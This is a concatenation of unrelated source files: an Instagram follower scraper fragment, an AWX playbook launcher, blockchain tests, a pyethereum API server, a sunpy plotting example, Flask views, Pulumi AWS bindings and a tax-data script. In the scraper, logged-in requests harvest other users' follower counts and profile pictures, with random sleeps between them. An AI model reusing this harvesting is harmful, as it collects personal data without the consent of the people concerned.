fullPath = path + "\\pictures\\"
liste = os.listdir(fullPath)
for pic in liste:
im = Image.open(fullPath + pic)
# im.thumbnail((150,150))
# im.save(fullPath+pic.split(".")[0]+'NEWNEW.png', "png")
im_square = crop_max_square(im).resize((150, 150), Image.LANCZOS)
im_thumb = mask_circle_transparent(im_square, 4)
im_thumb.save(fullPath + pic.split(".")[0] + 'Alpha.png')
def additionalUserInfo(self): #Only fetches extra info for the people where pictures are required too (not everyone needs
conn = sqlite3.connect(self.dbName)
c = conn.cursor()
c.execute("""SELECT instaID FROM userData WHERE picNeeded = True AND followerCount IS NULL""") #If followerCount == NUll dann wurde die aktion noch nicht durchgeführt und somit müssen die Daten noch geholt werden
profileIDs = c.fetchall()
additionalInfo = {}
print(profileIDs)
for profileID in profileIDs:
try:
print(profileID[0])
account = instagram.get_account_by_id(profileID[0])
rand = random.randint(0, 3)
sleep(rand)
additionalInfo[profileID[0]] = [account.media_count,account.follows_count,account.followed_by_count]
except Exception:
print("BROKEN")
break
for Info in additionalInfo:
print(Info)
c.execute("""UPDATE userData SET mediaCount = ?, followingsCount = ?, followerCount = ? WHERE instaID = ?""", (additionalInfo[Info][0],additionalInfo[Info][1],additionalInfo[Info][2], Info,))
conn.commit()
conn.close()
#Diese Funktion ist mit hoher wahrscheinlichkeit noch nicht ganz korrekt und muss noch verbessert werden.
#Sie wurde bisher noch nicht getestet.
def ClearFolder(self):
path = os.getcwd()
print(path)
fullPath = path + "\\pictures\\"
liste = os.listdir(fullPath)
for pic in liste:
if pic[-5].isalpha():
os.remove(fullPath + pic)
instagram = ModifiedInsta()
instagram.with_credentials(MAINUSERNAME, MAINPASSWORD)
#First Parameter MainUser. 2nd Parameter Followers/Followings
instagram.fromScratch("INSTAGRAMUSER",0,1,100,100)#Pass 0 to check most recent followers, pass 1 for most recent followings
##instagram.furtherAggregate("EXISTINGDB.db",0,30) #Keep collecting data using existing database
#instagram.setDbName("1586871777.db")
dataObject = DataAnalysis(instagram.dbName)
dataObject.networkGraphText(1,1) #Not all pictures are being downloaded to save time
instagram.getPhotoData() #downloads profile pictures of needed users
instagram.imageProcessing() #Adds the alpha channel to profile pictures
#Wenn man eine Zahl(Int) übergibt als 2. Parameter werden alle Follower die threshold<=Zahl Connections haben aus dem Graphen geworfen (Standardmäßig 0 damit keiner verloren geht)
dataObject.networkGraph(1,1)# Bei 00, 10 mode=0, Bei 11, 01 mode=1 -> Databasestructure changes based parameters given before the graphing happens
#instagram.additionalUserInfo() #Gets follower-,follwings- and mediacount for all necessary users
#instagram.ClearFolder() | 46.292428 | 337 | 0.608065 |
f564a32f841736ace4058831d6040dc6be3337f5 | 4,414 | py | Python | task-library/ansible/AwxRunPlaybook.py | mlavi/blueprints | b4aca2f11acc39b11b11819e6d123fc243a61c95 | [
"MIT"
] | 60 | 2018-08-06T23:44:54.000Z | 2022-03-02T21:21:30.000Z | task-library/ansible/AwxRunPlaybook.py | mlavi/blueprints | b4aca2f11acc39b11b11819e6d123fc243a61c95 | [
"MIT"
] | 16 | 2018-12-10T10:56:31.000Z | 2021-11-23T08:12:10.000Z | task-library/ansible/AwxRunPlaybook.py | mlavi/blueprints | b4aca2f11acc39b11b11819e6d123fc243a61c95 | [
"MIT"
] | 95 | 2018-09-14T15:03:35.000Z | 2021-12-21T10:45:19.000Z | # region headers
# escript-template v20190605 / stephane.bourdeaud@nutanix.com
# * author: jose.gomez@nutanix.com
# * version: 20200218
# task_type: Execute
# task_name: LaunchJobTemplate
# description: Launch a job template or also known playbook
# endregion
# region capture Calm variables
# * Capture variables here. This makes sure Calm macros are not referenced
# * anywhere else in order to improve maintainability.
awx_username = '@@{awx.username}@@'
awx_password = '@@{awx.secret}@@'
awx_api = '@@{awx_ip}@@'
awx_job_template_id = int('@@{awx_job_template_id}@@')
awx_extra_vars = "" #@@{awx_extra_vars}@@
host_ip = '@@{address}@@'
# endregion
# region functions
def make_api_call(url,method,username,username_secret,payload=None):
"""Makes an API call to an external API.
Args:
url: The URL for the external REST API endpoint.
method: The REST method to use.
username: The API user name.
username_secret: The API user name password.
payload: The JSON payload to include in the call.
Returns:
The API response.
"""
headers = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
while True:
print("Making a {} API call to {}".format(method, url))
if payload:
resp = urlreq(
url,
verb=method,
auth='BASIC',
user=username,
passwd=username_secret,
params=json.dumps(payload),
headers=headers,
verify=False
)
else:
resp = urlreq(
url,
verb=method,
auth='BASIC',
user=username,
passwd=username_secret,
headers=headers,
verify=False
)
# deal with the result/response
if resp.ok:
return resp
else:
print("Request failed")
print("Headers: {}".format(headers))
print("Payload: {}".format(json.dumps(payload)))
print('Status code: {}'.format(resp.status_code))
print('Response: {}'.format(
json.dumps(
json.loads(resp.content),
indent=4)))
exit(1)
def awx_run_job_template(api,username,password,job_template_id,host_ip,extra_vars=None):
# region prepare api call
# Form method, url and headers for the API call
api_port = "80"
api_endpoint = "/api/v2/job_templates/"
api_action = "/launch/"
url = "http://{}:{}{}{}{}".format(
api,
api_port,
api_endpoint,
job_template_id,
api_action
)
method = "POST"
payload = {
"extra_vars": extra_vars,
"limit": "@@{address}@@"
}
r = make_api_call(
url,
method,
username,
password,
payload
)
if r.ok:
job_id = json.loads(r.content)['job']
print 'Ansible Job ID: {0}'.format(job_id)
awx_poll_job(api,username,password,job_id)
print 'Ansible job status: successful'
else:
print 'Request failed', r.content
exit(1)
def awx_poll_job(api,username,password,job_id):
# region prepare api call
# Form method, url and headers for the API call
api_port = "80"
api_endpoint = "/api/v2/jobs/"
url = "http://{}:{}{}{}/".format(
api,
api_port,
api_endpoint,
job_id,
)
method = "GET"
retries = 360
job_status = ''
while job_status != 'successful':
r = make_api_call(
url,
method,
username,
password,
)
if r.ok:
job_status = json.loads(r.content)['status']
if job_status == "failed" or job_status == "error":
print "Ansible job failed"
break
else:
print 'Post request failed', r.content
exit(1)
sleep(10)
retries -= 1
if retries == 0:
# if job hasn't finished yet, give up
print 'Job may still running. Increase the retries or sleep time'
exit(0)
# endregion
awx_run_job_template(awx_api,awx_username,awx_password,awx_job_template_id,host_ip,awx_extra_vars) | 26.590361 | 98 | 0.548482 |
56bf57afa8b9026780a40663435a2b6223eccba0 | 4,774 | py | Python | suites/Operations/CommitteeMember/CommitteeFrozenBalanceWithdraw.py | echoprotocol/pytests | 5dce698558c2ba703aea03aab79906af1437da5d | [
"MIT"
] | 1 | 2021-03-12T05:17:02.000Z | 2021-03-12T05:17:02.000Z | suites/Operations/CommitteeMember/CommitteeFrozenBalanceWithdraw.py | echoprotocol/pytests | 5dce698558c2ba703aea03aab79906af1437da5d | [
"MIT"
] | 1 | 2019-11-19T12:10:59.000Z | 2019-11-19T12:10:59.000Z | suites/Operations/CommitteeMember/CommitteeFrozenBalanceWithdraw.py | echoprotocol/pytests | 5dce698558c2ba703aea03aab79906af1437da5d | [
"MIT"
] | 2 | 2019-04-29T10:46:48.000Z | 2019-10-29T10:01:03.000Z | # -*- coding: utf-8 -*-
import time
from common.base_test import BaseTest
from project import INIT0_PK, REQUIRED_DEPOSIT_AMOUNT, UNFREEZE_DURATION_SECONDS
import lemoncheesecake.api as lcc
from lemoncheesecake.matching import check_that, equal_to
SUITE = {
"description": "Operation 'committee_frozen_balance_withdraw'"
}
@lcc.prop("main", "type")
@lcc.tags("operations", "committee_member_operations", "committee_frozen_balance_withdraw")
@lcc.suite("Check work of operation 'committee_frozen_balance_withdraw'", rank=1)
class CommitteeFrozenBalanceWithdraw(BaseTest):
def __init__(self):
super().__init__()
self.__database_api_identifier = None
self.init0 = None
def setup_suite(self):
super().setup_suite()
self._connect_to_echopy_lib()
lcc.set_step("Setup for {}".format(self.__class__.__name__))
self.__database_api_identifier = self.get_identifier("database")
lcc.log_info("API identifiers are: database='{}'".format(self.__database_api_identifier))
self.committee_members_info = self.get_active_committee_members_info(self.__database_api_identifier)
self.init0 = self.committee_members_info[0]["account_id"]
self.committee_member_id = self.committee_members_info[0]["committee_id"]
lcc.log_info(
"Echo initial accounts: {}, initial committee id: {}".format(self.init0, self.committee_member_id)
)
def teardown_suite(self):
self._disconnect_to_echopy_lib()
super().teardown_suite()
@lcc.test("Simple work of operation 'committee_frozen_balance_withdraw'")
def method_main_check(self):
amount_to_freeze = REQUIRED_DEPOSIT_AMOUNT * 2
lcc.set_step("Check active committee member frozen balance")
response_id = self.send_request(
self.get_request("get_committee_frozen_balance", [self.committee_member_id]), self.__database_api_identifier
)
current_frozen_balance = self.get_response(response_id)["result"]["amount"]
lcc.log_info("{} account, has frozen balance amount: {}".format(self.init0, current_frozen_balance))
if int(current_frozen_balance) <= REQUIRED_DEPOSIT_AMOUNT:
lcc.log_info("Not enought asset to withdraw frozen balance")
lcc.set_step("Freeze asset of committee_member: '{}' account".format(self.init0))
operation = self.echo_ops.get_committee_frozen_balance_deposit_operation(
echo=self.echo,
committee_member=self.committee_member_id,
committee_member_account=self.init0,
amount=amount_to_freeze,
asset_id=self.echo_asset,
signer=INIT0_PK
)
collected_operation = self.collect_operations(operation, self.__database_api_identifier)
broadcast_result = self.echo_ops.broadcast(echo=self.echo, list_operations=collected_operation)
if not self.is_operation_completed(broadcast_result, expected_static_variant=0):
raise Exception("Balance is not freezed")
response_id = self.send_request(
self.get_request("get_committee_frozen_balance", [self.committee_member_id]), self.__database_api_identifier
)
current_frozen_balance = self.get_response(response_id)["result"]["amount"]
lcc.log_info(
"Account {} frozen balance updated, frozen balance amount: {}".format(self.init0, current_frozen_balance)
)
withdraw_amount = current_frozen_balance - REQUIRED_DEPOSIT_AMOUNT
lcc.set_step("Withdraw balance of active committee member")
time.sleep(UNFREEZE_DURATION_SECONDS + 1)
operation = self.echo_ops.get_committee_frozen_balance_withdraw_operation(
echo=self.echo,
committee_member_account=self.init0,
amount=withdraw_amount,
asset_id=self.echo_asset,
signer=INIT0_PK
)
collected_operation = self.collect_operations(operation, self.__database_api_identifier)
broadcast_result = self.echo_ops.broadcast(echo=self.echo, list_operations=collected_operation)
if not self.is_operation_completed(broadcast_result, expected_static_variant=0):
raise Exception("Balance is not withdrawn")
lcc.log_info("Committee member balance have been withdrawn")
lcc.set_step("Check that frozen balance have been withdrawn")
response_id = self.send_request(
self.get_request("get_committee_frozen_balance", [self.committee_member_id]), self.__database_api_identifier
)
frozen_balance_after_withdraw = self.get_response(response_id)["result"]["amount"]
check_that("frozen balance", frozen_balance_after_withdraw, equal_to(REQUIRED_DEPOSIT_AMOUNT))
| 48.222222 | 120 | 0.718266 |
ed99f11782aa6a67cefddb241f49db65b57cee73 | 4,214 | py | Python | pyethereum/apiserver.py | mrmayfield/pyethereum | 6a3cad803f256b012d5a3c6a254c214f9ebe815d | [
"MIT"
] | 1 | 2015-11-05T19:27:58.000Z | 2015-11-05T19:27:58.000Z | pyethereum/apiserver.py | mrmayfield/pyethereum | 6a3cad803f256b012d5a3c6a254c214f9ebe815d | [
"MIT"
] | null | null | null | pyethereum/apiserver.py | mrmayfield/pyethereum | 6a3cad803f256b012d5a3c6a254c214f9ebe815d | [
"MIT"
] | null | null | null | import logging
import threading
import json
import bottle
from pyethereum.chainmanager import chain_manager
from pyethereum.peermanager import peer_manager
import pyethereum.dispatch as dispatch
from pyethereum.blocks import block_structure
import pyethereum.signals as signals
from pyethereum.transactions import Transaction
logger = logging.getLogger(__name__)
base_url = '/api/v0alpha'
app = bottle.Bottle()
app.config['autojson'] = True
class ApiServer(threading.Thread):
def __init__(self):
super(ApiServer, self).__init__()
self.daemon = True
self.listen_host = '127.0.0.1'
self.port = 30203
def configure(self, config):
self.listen_host = config.get('api', 'listen_host')
self.port = config.getint('api', 'listen_port')
def run(self):
middleware = CorsMiddleware(app)
bottle.run(middleware, server='waitress',
host=self.listen_host, port=self.port)
# ###### create server ######
api_server = ApiServer()
@dispatch.receiver(signals.config_ready)
def config_api_server(sender, config, **kwargs):
api_server.configure(config)
# #######cors##############
class CorsMiddleware:
HEADERS = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Methods', 'GET, POST, OPTIONS'),
('Access-Control-Allow-Headers',
'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token')
]
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
if environ["REQUEST_METHOD"] == "OPTIONS":
start_response('200 OK',
CorsMiddleware.HEADERS + [('Content-Length', "0")])
return ""
else:
def my_start_response(status, headers, exc_info=None):
headers.extend(CorsMiddleware.HEADERS)
return start_response(status, headers, exc_info)
return self.app(environ, my_start_response)
# ######### Utilities ########
def load_json_req():
json_body = bottle.request.json
if not json_body:
json_body = json.load(bottle.request.body)
return json_body
# ######## Blocks ############
def make_blocks_response(blocks):
objs = []
for block in blocks:
obj = block.to_dict()
for item_name, item_type, _ in block_structure:
if item_type in ["bin", "trie_root"]:
obj[item_name] = obj[item_name].encode('hex')
objs.append(obj)
return dict(blocks=objs)
@app.get(base_url + '/blocks/')
def blocks():
logger.debug('blocks/')
return make_blocks_response(chain_manager.get_chain(start='', count=20))
@app.get(base_url + '/blocks/<blockhash>')
def block(blockhash=None):
logger.debug('blocks/%s', blockhash)
blockhash = blockhash.decode('hex')
if blockhash in chain_manager:
return make_blocks_response(chain_manager.get(blockhash))
else:
return bottle.abort(404, 'No block with id %s' % blockhash)
# ######## Transactions ############
@app.put(base_url + '/transactions/')
def transactions():
# request.json FIXME / post json encoded data? i.e. the representation of
# a tx
hex_data = bottle.request.body.read()
logger.debug('PUT transactions/ %s', hex_data)
tx = Transaction.hex_deserialize(hex_data)
signals.local_transaction_received.send(sender=None, transaction=tx)
return bottle.redirect(base_url + '/transactions/' + tx.hex_hash())
# ######## Accounts ############
@app.get(base_url + '/accounts/')
def accounts():
logger.debug('accounts')
pass
@app.get(base_url + '/accounts/<address>')
def account(address=None):
logger.debug('account/%s', address)
pass
# ######## Peers ###################
def make_peers_response(peers):
objs = [dict(ip=ip, port=port, node_id=node_id.encode('hex'))
for (ip, port, node_id) in peers]
return dict(peers=objs)
@app.get(base_url + '/peers/connected')
def connected_peers():
return make_peers_response(peer_manager.get_connected_peer_addresses())
@app.get(base_url + '/peers/known')
def known_peers():
return make_peers_response(peer_manager.get_known_peer_addresses())
| 28.093333 | 78 | 0.649027 |
ae73feb3ab30e10e49f6953f48e42dc5eee83b4a | 870 | py | Python | test/test_interface.py | inexio/thola-client-python | f9a6812885738e33b1aed43ca55335b71e3d2b2d | [
"BSD-2-Clause"
] | 1 | 2021-12-28T18:53:52.000Z | 2021-12-28T18:53:52.000Z | test/test_interface.py | inexio/thola-client-python | f9a6812885738e33b1aed43ca55335b71e3d2b2d | [
"BSD-2-Clause"
] | null | null | null | test/test_interface.py | inexio/thola-client-python | f9a6812885738e33b1aed43ca55335b71e3d2b2d | [
"BSD-2-Clause"
] | null | null | null | # coding: utf-8
"""
Thola
REST API for Thola. For more information look at our Github : https://github.com/inexio/thola # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import thola_client
from thola_client.models.interface import Interface # noqa: E501
from thola_client.rest import ApiException
class TestInterface(unittest.TestCase):
"""Interface unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInterface(self):
"""Test Interface"""
# FIXME: construct object with mandatory attributes with example values
# model = thola_client.models.interface.Interface() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 21.219512 | 112 | 0.683908 |
062c3c035844b5adf510331716119627f40f017e | 4,156 | py | Python | examples/plotting/hmi_cutout.py | fluxtransport/sunpy | 351d3edca97e779179f367670292c95574c7a222 | [
"BSD-2-Clause"
] | null | null | null | examples/plotting/hmi_cutout.py | fluxtransport/sunpy | 351d3edca97e779179f367670292c95574c7a222 | [
"BSD-2-Clause"
] | null | null | null | examples/plotting/hmi_cutout.py | fluxtransport/sunpy | 351d3edca97e779179f367670292c95574c7a222 | [
"BSD-2-Clause"
] | null | null | null | """
====================
HMI Showcase: Cutout
====================
This example demonstrates how to plot a cutout region of a `~sunpy.map.Map`
with connector lines that indicate the region of interest in the full-disk
image.
Since this example deals with the creation of a specific style of image, there
are multiple lines that deal directly with matplotlib axes.
"""
import matplotlib.colors
import matplotlib.pyplot as plt
from matplotlib.patches import ConnectionPatch
import astropy.units as u
from astropy.coordinates import SkyCoord
import sunpy.map
from sunpy.data.sample import HMI_LOS_IMAGE
##############################################################################
# First, we use the sample HMI LOS image and focus the cutout over an active
# region near the solar center.
magnetogram = sunpy.map.Map(HMI_LOS_IMAGE).rotate()
left_corner = SkyCoord(Tx=-142*u.arcsec, Ty=50*u.arcsec, frame=magnetogram.coordinate_frame)
right_corner = SkyCoord(Tx=158*u.arcsec, Ty=350*u.arcsec, frame=magnetogram.coordinate_frame)
##############################################################################
# We clean up the magnetogram by masking off all data that is beyond the solar
# limb.
hpc_coords = sunpy.map.all_coordinates_from_map(magnetogram)
mask = ~sunpy.map.coordinate_is_on_solar_disk(hpc_coords)
magnetogram_big = sunpy.map.Map(magnetogram.data, magnetogram.meta, mask=mask)
##############################################################################
# We create the figure in two stages. From here on, the rest of the comments
# will be inside the code block.
# The first stage is plotting the full-disk magnetogram.
fig = plt.figure(figsize=(7.2, 4.8))
# We create a nice normalization range for the image
norm = matplotlib.colors.SymLogNorm(50, vmin=-7.5e2, vmax=7.5e2)
# Plot the full-disk magnetogram
ax1 = fig.add_subplot(121, projection=magnetogram_big)
magnetogram_big.plot(axes=ax1, cmap='RdBu_r', norm=norm, annotate=False,)
magnetogram_big.draw_grid(axes=ax1, color='k', alpha=0.25, lw=0.5)
# These lines deal with hiding the axis, its ticks and labels
for coord in ax1.coords:
coord.frame.set_linewidth(0)
coord.set_ticks_visible(False)
coord.set_ticklabel_visible(False)
# We draw the rectangle around the region we plan to showcase in the cutout image.
magnetogram_big.draw_rectangle(left_corner, top_right=right_corner, color='k', lw=1)
# The second stage is plotting the zoomed-in magnetogram.
magnetogram_small = magnetogram.submap(left_corner, top_right=right_corner)
ax2 = fig.add_subplot(122, projection=magnetogram_small)
im = magnetogram_small.plot(axes=ax2, norm=norm, cmap='RdBu_r', annotate=False,)
ax2.grid(alpha=0)
# Unlike the full-disk image, here we just clean up the axis labels and ticks.
lon, lat = ax2.coords[0], ax2.coords[1]
lon.frame.set_linewidth(1)
lat.frame.set_linewidth(1)
lon.set_axislabel('Helioprojective Longitude',)
lon.set_ticks_position('b')
lat.set_axislabel('Helioprojective Latitude',)
lat.set_axislabel_position('r')
lat.set_ticks_position('r')
lat.set_ticklabel_position('r')
# Now for the finishing touches, we add two lines that will connect
# the two images as well as a colorbar.
xpix, ypix = magnetogram_big.world_to_pixel(right_corner)
con1 = ConnectionPatch(
(0, 1), (xpix.value, ypix.value), 'axes fraction', 'data', axesA=ax2, axesB=ax1,
arrowstyle='-', color='k', lw=1
)
xpix, ypix = magnetogram_big.world_to_pixel(
SkyCoord(right_corner.Tx, left_corner.Ty, frame=magnetogram_big.coordinate_frame))
con2 = ConnectionPatch(
(0, 0), (xpix.value, ypix.value), 'axes fraction', 'data', axesA=ax2, axesB=ax1,
arrowstyle='-', color='k', lw=1
)
ax2.add_artist(con1)
ax2.add_artist(con2)
pos = ax2.get_position().get_points()
cax = fig.add_axes([
pos[0, 0], pos[1, 1]+0.01, pos[1, 0]-pos[0, 0], 0.025
])
cbar = fig.colorbar(im, cax=cax, orientation='horizontal')
# For the colorbar we want it to have three fixed ticks
cbar.locator = matplotlib.ticker.FixedLocator([-1e2, 0, 1e2])
cbar.set_label("LOS Magnetic Field [gauss]", labelpad=-40, rotation=0)
cbar.update_ticks()
cbar.ax.xaxis.set_ticks_position('top')
plt.show()
| 38.12844 | 93 | 0.713426 |
4132600bc865bcd7ef0fd0c1221153aff3bbd3a0 | 439 | py | Python | price_picker/views/main/validators.py | M0r13n/price_picker | aaa4e79496753bc3b61afbde6324868ee5c46aa5 | [
"MIT"
] | 3 | 2019-08-03T16:52:36.000Z | 2020-04-13T10:06:38.000Z | price_picker/views/main/validators.py | M0r13n/price_picker | aaa4e79496753bc3b61afbde6324868ee5c46aa5 | [
"MIT"
] | null | null | null | price_picker/views/main/validators.py | M0r13n/price_picker | aaa4e79496753bc3b61afbde6324868ee5c46aa5 | [
"MIT"
] | 1 | 2021-01-02T11:31:25.000Z | 2021-01-02T11:31:25.000Z | from wtforms.validators import ValidationError
from price_picker.models import CouponCode
class CouponCodeValidator(object):
def __init__(self, message=None):
if message is None:
message = 'Ungültiger Code.'
self.message = message
def __call__(self, form, field):
code = CouponCode.query.filter_by(code=field.data).first()
if not code:
raise ValidationError(self.message)
| 29.266667 | 66 | 0.683371 |
66af5b756de02b6cc4aedfe8e1b619517e232a20 | 1,382 | py | Python | app/views/main/photos.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/main/photos.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/main/photos.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | from flask import render_template, redirect, url_for, request
from app import db, logger
from app.controllers.app_controller import app_controller
from app.controllers.qustion_phone import question_phone
from app.models.photo_catalogs import PhotoCatalogs
from app.models.photos import Photos
from app.views.main import bp
@bp.route('/photos', methods=['GET', 'POST'])
@app_controller
@question_phone
def photos(**kwargs):
catalog_id = 0
is_photos = False
try:
if request.args.get('catalog_id') is not None and request.args.get('catalog_id') != '':
catalog_id = int(request.args.get('catalog_id'))
is_photos = True
except Exception as e:
logger.error(e)
return redirect(url_for('main.photos'))
if catalog_id > 0:
catalog = db.session.query(PhotoCatalogs).filter(PhotoCatalogs.id == catalog_id).first()
if catalog.status == 0:
return redirect(url_for('main.photos'))
kwargs['is_photos'] = is_photos
kwargs['photos'] = db.session.query(Photos).filter(Photos.catalog_id == catalog_id, Photos.status == 1).all()
kwargs['catalog'] = catalog
kwargs['title'] = 'Фотогалерея'
kwargs['catalogs'] = db.session.query(PhotoCatalogs).filter(PhotoCatalogs.status == 1).order_by(PhotoCatalogs.name).all()
return render_template("default/photos.html", **kwargs) | 39.485714 | 125 | 0.696816 |
31da8b4b2f25113381afa6f49ef642d7e91d48c8 | 7,163 | py | Python | sdk/python/pulumi_aws/ec2/get_instance_type_offerings.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 260 | 2018-06-18T14:57:00.000Z | 2022-03-29T11:41:03.000Z | sdk/python/pulumi_aws/ec2/get_instance_type_offerings.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 1,154 | 2018-06-19T20:38:20.000Z | 2022-03-31T19:48:16.000Z | sdk/python/pulumi_aws/ec2/get_instance_type_offerings.py | chivandikwa/pulumi-aws | 19c08bf9dcb90544450ffa4eec7bf6751058fde2 | [
"ECL-2.0",
"Apache-2.0"
] | 115 | 2018-06-28T03:20:27.000Z | 2022-03-29T11:41:06.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = [
'GetInstanceTypeOfferingsResult',
'AwaitableGetInstanceTypeOfferingsResult',
'get_instance_type_offerings',
'get_instance_type_offerings_output',
]
@pulumi.output_type
class GetInstanceTypeOfferingsResult:
"""
A collection of values returned by getInstanceTypeOfferings.
"""
def __init__(__self__, filters=None, id=None, instance_types=None, location_type=None, location_types=None, locations=None):
if filters and not isinstance(filters, list):
raise TypeError("Expected argument 'filters' to be a list")
pulumi.set(__self__, "filters", filters)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if instance_types and not isinstance(instance_types, list):
raise TypeError("Expected argument 'instance_types' to be a list")
pulumi.set(__self__, "instance_types", instance_types)
if location_type and not isinstance(location_type, str):
raise TypeError("Expected argument 'location_type' to be a str")
pulumi.set(__self__, "location_type", location_type)
if location_types and not isinstance(location_types, list):
raise TypeError("Expected argument 'location_types' to be a list")
pulumi.set(__self__, "location_types", location_types)
if locations and not isinstance(locations, list):
raise TypeError("Expected argument 'locations' to be a list")
pulumi.set(__self__, "locations", locations)
@property
@pulumi.getter
def filters(self) -> Optional[Sequence['outputs.GetInstanceTypeOfferingsFilterResult']]:
return pulumi.get(self, "filters")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="instanceTypes")
def instance_types(self) -> Sequence[str]:
"""
List of EC2 Instance Types.
"""
return pulumi.get(self, "instance_types")
@property
@pulumi.getter(name="locationType")
def location_type(self) -> Optional[str]:
return pulumi.get(self, "location_type")
@property
@pulumi.getter(name="locationTypes")
def location_types(self) -> Sequence[str]:
"""
List of location types.
"""
return pulumi.get(self, "location_types")
@property
@pulumi.getter
def locations(self) -> Sequence[str]:
"""
List of locations.
"""
return pulumi.get(self, "locations")
class AwaitableGetInstanceTypeOfferingsResult(GetInstanceTypeOfferingsResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetInstanceTypeOfferingsResult(
filters=self.filters,
id=self.id,
instance_types=self.instance_types,
location_type=self.location_type,
location_types=self.location_types,
locations=self.locations)
def get_instance_type_offerings(filters: Optional[Sequence[pulumi.InputType['GetInstanceTypeOfferingsFilterArgs']]] = None,
location_type: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetInstanceTypeOfferingsResult:
"""
Information about EC2 Instance Type Offerings.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.ec2.get_instance_type_offerings(filters=[
aws.ec2.GetInstanceTypeOfferingsFilterArgs(
name="instance-type",
values=[
"t2.micro",
"t3.micro",
],
),
aws.ec2.GetInstanceTypeOfferingsFilterArgs(
name="location",
values=["usw2-az4"],
),
],
location_type="availability-zone-id")
```
:param Sequence[pulumi.InputType['GetInstanceTypeOfferingsFilterArgs']] filters: One or more configuration blocks containing name-values filters. See the [EC2 API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstanceTypeOfferings.html) for supported filters. Detailed below.
:param str location_type: Location type. Defaults to `region`. Valid values: `availability-zone`, `availability-zone-id`, and `region`.
"""
__args__ = dict()
__args__['filters'] = filters
__args__['locationType'] = location_type
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws:ec2/getInstanceTypeOfferings:getInstanceTypeOfferings', __args__, opts=opts, typ=GetInstanceTypeOfferingsResult).value
return AwaitableGetInstanceTypeOfferingsResult(
filters=__ret__.filters,
id=__ret__.id,
instance_types=__ret__.instance_types,
location_type=__ret__.location_type,
location_types=__ret__.location_types,
locations=__ret__.locations)
@_utilities.lift_output_func(get_instance_type_offerings)
def get_instance_type_offerings_output(filters: Optional[pulumi.Input[Optional[Sequence[pulumi.InputType['GetInstanceTypeOfferingsFilterArgs']]]]] = None,
location_type: Optional[pulumi.Input[Optional[str]]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetInstanceTypeOfferingsResult]:
"""
Information about EC2 Instance Type Offerings.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.ec2.get_instance_type_offerings(filters=[
aws.ec2.GetInstanceTypeOfferingsFilterArgs(
name="instance-type",
values=[
"t2.micro",
"t3.micro",
],
),
aws.ec2.GetInstanceTypeOfferingsFilterArgs(
name="location",
values=["usw2-az4"],
),
],
location_type="availability-zone-id")
```
:param Sequence[pulumi.InputType['GetInstanceTypeOfferingsFilterArgs']] filters: One or more configuration blocks containing name-values filters. See the [EC2 API Reference](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstanceTypeOfferings.html) for supported filters. Detailed below.
:param str location_type: Location type. Defaults to `region`. Valid values: `availability-zone`, `availability-zone-id`, and `region`.
"""
...
| 38.510753 | 311 | 0.656987 |
a6c14cd18b926fdfe8c73fa4569e1b044322cb20 | 1,740 | py | Python | puf_stage2/stage2.py | chusloj/taxdata | 52c02c5f457145413983762280f8c1552b5ac740 | [
"CC0-1.0"
] | null | null | null | puf_stage2/stage2.py | chusloj/taxdata | 52c02c5f457145413983762280f8c1552b5ac740 | [
"CC0-1.0"
] | null | null | null | puf_stage2/stage2.py | chusloj/taxdata | 52c02c5f457145413983762280f8c1552b5ac740 | [
"CC0-1.0"
] | null | null | null | import os
import glob
import numpy as np
import pandas as pd
from dataprep import dataprep
CUR_PATH = os.path.abspath(os.path.dirname(__file__))
# Read private CPS-matched-PUF file into a Pandas DataFrame
puf = pd.read_csv(os.path.join(CUR_PATH, "../puf_data/cps-matched-puf.csv"))
# Read stage1 factors and stage2 targets written by stage1.py script
factors = pd.read_csv(
os.path.join(CUR_PATH, "../puf_stage1/Stage_I_factors.csv"), index_col=0
)
Stage_I_factors = factors.transpose()
stage2_path = os.path.join(CUR_PATH, "../puf_stage1/Stage_II_targets.csv")
Stage_II_targets = pd.read_csv(stage2_path, index_col=0)
# Use the matched_weight variable in CPS as the final weight
puf.s006 = puf.matched_weight * 100
# Dataprep
year_list = [x for x in range(2012, 2030 + 1)]
for i in year_list:
dataprep(puf, Stage_I_factors, Stage_II_targets, year=i)
# Solver (in Julia)
env_path = os.path.join(CUR_PATH, "../Project.toml")
os.system(f"julia --project={env_path} solver.jl")
# Initialize weights dataframe
z = pd.DataFrame()
